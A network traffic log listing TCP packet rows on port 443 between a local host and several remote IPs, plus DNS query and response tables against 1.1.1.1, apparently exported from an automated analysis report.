Jan 10, 2025 23:25:53.939706087 CET | 49738 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:53.941217899 CET | 49738 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:53.941239119 CET | 443 | 49738 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:53.942713976 CET | 443 | 49738 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:53.943783045 CET | 49738 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:53.943810940 CET | 49738 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:53.943871975 CET | 443 | 49738 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:54.437509060 CET | 443 | 49738 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:54.437642097 CET | 443 | 49738 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:54.437704086 CET | 49738 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:54.437726021 CET | 443 | 49738 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:54.437752962 CET | 443 | 49738 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:54.437802076 CET | 49738 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:54.437843084 CET | 443 | 49738 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:54.437989950 CET | 443 | 49738 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:54.438038111 CET | 49738 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:54.438055992 CET | 443 | 49738 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:54.438165903 CET | 443 | 49738 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:54.438215017 CET | 49738 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:54.438227892 CET | 443 | 49738 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:54.438604116 CET | 443 | 49738 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:54.438658953 CET | 49738 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:54.438672066 CET | 443 | 49738 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:54.442115068 CET | 443 | 49738 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:54.442168951 CET | 49738 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:54.442183018 CET | 443 | 49738 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:54.487088919 CET | 49738 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:54.523359060 CET | 443 | 49738 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:54.523447990 CET | 443 | 49738 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:54.523494005 CET | 443 | 49738 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:54.523525000 CET | 49738 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:54.523528099 CET | 443 | 49738 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:54.523545027 CET | 443 | 49738 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:54.523570061 CET | 49738 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:54.558929920 CET | 443 | 49738 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:54.559045076 CET | 49738 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:54.559156895 CET | 49738 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:54.559190989 CET | 443 | 49738 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:54.559218884 CET | 49738 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:54.559235096 CET | 443 | 49738 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:54.869434118 CET | 49739 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:54.869499922 CET | 443 | 49739 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:54.869564056 CET | 49739 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:54.872623920 CET | 49739 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:54.872642040 CET | 443 | 49739 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:55.487665892 CET | 443 | 49739 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:55.487739086 CET | 49739 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:55.489439964 CET | 49739 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:55.489448071 CET | 443 | 49739 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:55.489841938 CET | 443 | 49739 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:55.490995884 CET | 49739 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:55.491213083 CET | 49739 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:55.491238117 CET | 443 | 49739 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:55.491297960 CET | 49739 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:55.491302967 CET | 443 | 49739 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:56.126036882 CET | 443 | 49739 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:56.126282930 CET | 443 | 49739 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:56.126336098 CET | 49739 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:56.126391888 CET | 49739 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:56.126413107 CET | 443 | 49739 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:56.203821898 CET | 49740 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:56.203880072 CET | 443 | 49740 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:56.203954935 CET | 49740 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:56.204235077 CET | 49740 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:56.204246998 CET | 443 | 49740 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:56.668142080 CET | 443 | 49740 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:56.668287039 CET | 49740 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:56.669411898 CET | 49740 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:56.669435024 CET | 443 | 49740 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:56.669801950 CET | 443 | 49740 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:56.671338081 CET | 49740 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:56.671473980 CET | 49740 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:56.671473980 CET | 49740 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:56.671540022 CET | 443 | 49740 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:57.133016109 CET | 443 | 49740 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:57.133150101 CET | 443 | 49740 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:57.133205891 CET | 49740 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:57.133400917 CET | 49740 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:57.133421898 CET | 443 | 49740 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:57.874037981 CET | 49741 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:57.874106884 CET | 443 | 49741 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:57.874200106 CET | 49741 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:57.874736071 CET | 49741 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:57.874756098 CET | 443 | 49741 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:58.560787916 CET | 443 | 49741 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:58.561139107 CET | 49741 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:58.562621117 CET | 49741 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:58.562653065 CET | 443 | 49741 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:58.563041925 CET | 443 | 49741 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:58.564487934 CET | 49741 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:58.564686060 CET | 49741 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:58.564728022 CET | 443 | 49741 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:58.564810991 CET | 49741 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:58.564827919 CET | 443 | 49741 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:59.175098896 CET | 443 | 49741 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:59.175231934 CET | 443 | 49741 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:59.175318003 CET | 49741 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:59.175431013 CET | 49741 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:59.175472975 CET | 443 | 49741 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:59.470824003 CET | 49742 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:59.470880985 CET | 443 | 49742 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:59.470979929 CET | 49742 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:59.471256971 CET | 49742 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:59.471271038 CET | 443 | 49742 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:59.959038019 CET | 443 | 49742 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:59.959188938 CET | 49742 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:59.960983038 CET | 49742 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:59.961002111 CET | 443 | 49742 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:59.961376905 CET | 443 | 49742 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:59.962683916 CET | 49742 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:59.962820053 CET | 49742 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:59.962842941 CET | 443 | 49742 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:00.431415081 CET | 443 | 49742 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:00.431539059 CET | 443 | 49742 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:00.431610107 CET | 49742 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:00.431854963 CET | 49742 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:00.431879044 CET | 443 | 49742 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:00.478384018 CET | 49743 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:00.478430986 CET | 443 | 49743 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:00.478523970 CET | 49743 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:00.478821039 CET | 49743 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:00.478831053 CET | 443 | 49743 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:00.936965942 CET | 443 | 49743 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:00.937078953 CET | 49743 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:00.938353062 CET | 49743 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:00.938363075 CET | 443 | 49743 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:00.938679934 CET | 443 | 49743 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:00.939799070 CET | 49743 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:00.939892054 CET | 49743 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:00.939897060 CET | 443 | 49743 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:01.895282030 CET | 443 | 49743 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:01.895432949 CET | 443 | 49743 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:01.895488977 CET | 49743 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:01.903541088 CET | 49743 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:01.903573990 CET | 443 | 49743 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:02.680313110 CET | 49744 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:02.680363894 CET | 443 | 49744 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:02.680433989 CET | 49744 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:02.681057930 CET | 49744 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:02.681070089 CET | 443 | 49744 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:03.143297911 CET | 443 | 49744 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:03.143433094 CET | 49744 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:03.144669056 CET | 49744 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:03.144678116 CET | 443 | 49744 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:03.145019054 CET | 443 | 49744 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:03.148936987 CET | 49744 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:03.149636030 CET | 49744 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:03.149691105 CET | 443 | 49744 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:03.149832964 CET | 49744 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:03.149863005 CET | 443 | 49744 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:03.150927067 CET | 49744 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:03.150966883 CET | 443 | 49744 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:03.156943083 CET | 49744 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:03.156972885 CET | 443 | 49744 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:03.157114029 CET | 49744 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:03.157143116 CET | 443 | 49744 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:03.157284021 CET | 49744 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:03.157309055 CET | 443 | 49744 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:03.157318115 CET | 49744 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:03.157329082 CET | 443 | 49744 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:03.157489061 CET | 49744 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:03.157515049 CET | 443 | 49744 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:03.157537937 CET | 49744 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:03.159970045 CET | 49744 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:03.160003901 CET | 49744 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:03.160213947 CET | 443 | 49744 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:03.160346031 CET | 49744 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:03.160362005 CET | 443 | 49744 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:03.160386086 CET | 49744 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:03.160408020 CET | 443 | 49744 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:03.160413980 CET | 49744 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:03.160459042 CET | 443 | 49744 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:03.160496950 CET | 49744 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:03.160531998 CET | 443 | 49744 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:04.637182951 CET | 443 | 49744 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:04.637312889 CET | 443 | 49744 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:04.637494087 CET | 49744 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:04.637567997 CET | 49744 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:04.637588978 CET | 443 | 49744 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:04.640840054 CET | 49745 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:04.640922070 CET | 443 | 49745 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:04.641036034 CET | 49745 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:04.641578913 CET | 49745 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:04.641604900 CET | 443 | 49745 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:05.129203081 CET | 443 | 49745 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:05.129327059 CET | 49745 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:05.130501986 CET | 49745 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:05.130517960 CET | 443 | 49745 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:05.130894899 CET | 443 | 49745 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:05.131931067 CET | 49745 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:05.131962061 CET | 49745 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:05.132070065 CET | 443 | 49745 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:12.724792957 CET | 443 | 49745 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:12.724889040 CET | 443 | 49745 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:12.724957943 CET | 49745 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:12.725447893 CET | 49745 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:12.725466013 CET | 443 | 49745 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:12.725485086 CET | 49745 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:26:12.725492001 CET | 443 | 49745 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:26:12.839258909 CET | 49782 | 443 | 192.168.2.4 | 185.161.251.21 |
Jan 10, 2025 23:26:12.839292049 CET | 443 | 49782 | 185.161.251.21 | 192.168.2.4 |
Jan 10, 2025 23:26:12.839392900 CET | 49782 | 443 | 192.168.2.4 | 185.161.251.21 |
Jan 10, 2025 23:26:12.839834929 CET | 49782 | 443 | 192.168.2.4 | 185.161.251.21 |
Jan 10, 2025 23:26:12.839849949 CET | 443 | 49782 | 185.161.251.21 | 192.168.2.4 |
Jan 10, 2025 23:26:13.578916073 CET | 443 | 49782 | 185.161.251.21 | 192.168.2.4 |
Jan 10, 2025 23:26:13.579046965 CET | 49782 | 443 | 192.168.2.4 | 185.161.251.21 |
Jan 10, 2025 23:26:13.580862045 CET | 49782 | 443 | 192.168.2.4 | 185.161.251.21 |
Jan 10, 2025 23:26:13.580884933 CET | 443 | 49782 | 185.161.251.21 | 192.168.2.4 |
Jan 10, 2025 23:26:13.581121922 CET | 443 | 49782 | 185.161.251.21 | 192.168.2.4 |
Jan 10, 2025 23:26:13.582768917 CET | 49782 | 443 | 192.168.2.4 | 185.161.251.21 |
Jan 10, 2025 23:26:13.623332024 CET | 443 | 49782 | 185.161.251.21 | 192.168.2.4 |
Jan 10, 2025 23:26:13.846781969 CET | 443 | 49782 | 185.161.251.21 | 192.168.2.4 |
Jan 10, 2025 23:26:13.846846104 CET | 443 | 49782 | 185.161.251.21 | 192.168.2.4 |
Jan 10, 2025 23:26:13.846901894 CET | 49782 | 443 | 192.168.2.4 | 185.161.251.21 |
Jan 10, 2025 23:26:13.847207069 CET | 49782 | 443 | 192.168.2.4 | 185.161.251.21 |
Jan 10, 2025 23:26:13.847223997 CET | 443 | 49782 | 185.161.251.21 | 192.168.2.4 |
Jan 10, 2025 23:26:13.847237110 CET | 49782 | 443 | 192.168.2.4 | 185.161.251.21 |
Jan 10, 2025 23:26:13.847244024 CET | 443 | 49782 | 185.161.251.21 | 192.168.2.4 |
Jan 10, 2025 23:26:13.914655924 CET | 49791 | 443 | 192.168.2.4 | 172.67.162.153 |
Jan 10, 2025 23:26:13.914701939 CET | 443 | 49791 | 172.67.162.153 | 192.168.2.4 |
Jan 10, 2025 23:26:13.914787054 CET | 49791 | 443 | 192.168.2.4 | 172.67.162.153 |
Jan 10, 2025 23:26:13.915286064 CET | 49791 | 443 | 192.168.2.4 | 172.67.162.153 |
Jan 10, 2025 23:26:13.915297985 CET | 443 | 49791 | 172.67.162.153 | 192.168.2.4 |
Jan 10, 2025 23:26:14.382591963 CET | 443 | 49791 | 172.67.162.153 | 192.168.2.4 |
Jan 10, 2025 23:26:14.382673025 CET | 49791 | 443 | 192.168.2.4 | 172.67.162.153 |
Jan 10, 2025 23:26:14.384725094 CET | 49791 | 443 | 192.168.2.4 | 172.67.162.153 |
Jan 10, 2025 23:26:14.384763002 CET | 443 | 49791 | 172.67.162.153 | 192.168.2.4 |
Jan 10, 2025 23:26:14.385004044 CET | 443 | 49791 | 172.67.162.153 | 192.168.2.4 |
Jan 10, 2025 23:26:14.388432026 CET | 49791 | 443 | 192.168.2.4 | 172.67.162.153 |
Jan 10, 2025 23:26:14.431348085 CET | 443 | 49791 | 172.67.162.153 | 192.168.2.4 |
Jan 10, 2025 23:26:14.549743891 CET | 443 | 49791 | 172.67.162.153 | 192.168.2.4 |
Jan 10, 2025 23:26:14.549865961 CET | 443 | 49791 | 172.67.162.153 | 192.168.2.4 |
Jan 10, 2025 23:26:14.549968004 CET | 443 | 49791 | 172.67.162.153 | 192.168.2.4 |
Jan 10, 2025 23:26:14.549962044 CET | 49791 | 443 | 192.168.2.4 | 172.67.162.153 |
Jan 10, 2025 23:26:14.550035000 CET | 443 | 49791 | 172.67.162.153 | 192.168.2.4 |
Jan 10, 2025 23:26:14.550134897 CET | 443 | 49791 | 172.67.162.153 | 192.168.2.4 |
Jan 10, 2025 23:26:14.550196886 CET | 49791 | 443 | 192.168.2.4 | 172.67.162.153 |
Jan 10, 2025 23:26:14.550218105 CET | 443 | 49791 | 172.67.162.153 | 192.168.2.4 |
Jan 10, 2025 23:26:14.550276041 CET | 49791 | 443 | 192.168.2.4 | 172.67.162.153 |
Jan 10, 2025 23:26:14.550291061 CET | 443 | 49791 | 172.67.162.153 | 192.168.2.4 |
Jan 10, 2025 23:26:14.550399065 CET | 443 | 49791 | 172.67.162.153 | 192.168.2.4 |
Jan 10, 2025 23:26:14.550502062 CET | 443 | 49791 | 172.67.162.153 | 192.168.2.4 |
Jan 10, 2025 23:26:14.550564051 CET | 49791 | 443 | 192.168.2.4 | 172.67.162.153 |
Jan 10, 2025 23:26:14.550579071 CET | 443 | 49791 | 172.67.162.153 | 192.168.2.4 |
Jan 10, 2025 23:26:14.550632000 CET | 49791 | 443 | 192.168.2.4 | 172.67.162.153 |
Jan 10, 2025 23:26:14.550643921 CET | 443 | 49791 | 172.67.162.153 | 192.168.2.4 |
Jan 10, 2025 23:26:14.596502066 CET | 49791 | 443 | 192.168.2.4 | 172.67.162.153 |
Jan 10, 2025 23:26:14.596565008 CET | 443 | 49791 | 172.67.162.153 | 192.168.2.4 |
Jan 10, 2025 23:26:14.638655901 CET | 443 | 49791 | 172.67.162.153 | 192.168.2.4 |
Jan 10, 2025 23:26:14.638762951 CET | 49791 | 443 | 192.168.2.4 | 172.67.162.153 |
Jan 10, 2025 23:26:14.638835907 CET | 443 | 49791 | 172.67.162.153 | 192.168.2.4 |
Jan 10, 2025 23:26:14.638914108 CET | 443 | 49791 | 172.67.162.153 | 192.168.2.4 |
Jan 10, 2025 23:26:14.638979912 CET | 49791 | 443 | 192.168.2.4 | 172.67.162.153 |
Jan 10, 2025 23:26:14.639172077 CET | 49791 | 443 | 192.168.2.4 | 172.67.162.153 |
Jan 10, 2025 23:26:14.639211893 CET | 443 | 49791 | 172.67.162.153 | 192.168.2.4 |
Jan 10, 2025 23:26:14.639238119 CET | 49791 | 443 | 192.168.2.4 | 172.67.162.153 |
Jan 10, 2025 23:26:14.639252901 CET | 443 | 49791 | 172.67.162.153 | 192.168.2.4 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 10, 2025 23:25:16.339616060 CET | 63253 | 53 | 192.168.2.4 | 1.1.1.1 |
Jan 10, 2025 23:25:16.347599983 CET | 53 | 63253 | 1.1.1.1 | 192.168.2.4 |
Jan 10, 2025 23:25:52.327697039 CET | 61909 | 53 | 192.168.2.4 | 1.1.1.1 |
Jan 10, 2025 23:25:52.348114967 CET | 53 | 61909 | 1.1.1.1 | 192.168.2.4 |
Jan 10, 2025 23:26:12.728949070 CET | 60779 | 53 | 192.168.2.4 | 1.1.1.1 |
Jan 10, 2025 23:26:12.838200092 CET | 53 | 60779 | 1.1.1.1 | 192.168.2.4 |
Jan 10, 2025 23:26:13.899981976 CET | 55987 | 53 | 192.168.2.4 | 1.1.1.1 |
Jan 10, 2025 23:26:13.913002968 CET | 53 | 55987 | 1.1.1.1 | 192.168.2.4 |
Jan 10, 2025 23:26:14.779987097 CET | 54404 | 53 | 192.168.2.4 | 1.1.1.1 |
Jan 10, 2025 23:26:14.791858912 CET | 53 | 54404 | 1.1.1.1 | 192.168.2.4 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Jan 10, 2025 23:25:16.339616060 CET | 192.168.2.4 | 1.1.1.1 | 0xb7d7 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 23:25:52.327697039 CET | 192.168.2.4 | 1.1.1.1 | 0x4c9d | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 23:26:12.728949070 CET | 192.168.2.4 | 1.1.1.1 | 0xe02d | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 23:26:13.899981976 CET | 192.168.2.4 | 1.1.1.1 | 0x300d | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 23:26:14.779987097 CET | 192.168.2.4 | 1.1.1.1 | 0xd9c1 | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Jan 10, 2025 23:25:16.347599983 CET | 1.1.1.1 | 192.168.2.4 | 0xb7d7 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
Jan 10, 2025 23:25:52.348114967 CET | 1.1.1.1 | 192.168.2.4 | 0x4c9d | No error (0) | 172.67.223.109 | A (IP address) | IN (0x0001) | false | ||
Jan 10, 2025 23:25:52.348114967 CET | 1.1.1.1 | 192.168.2.4 | 0x4c9d | No error (0) | 104.21.25.66 | A (IP address) | IN (0x0001) | false | ||
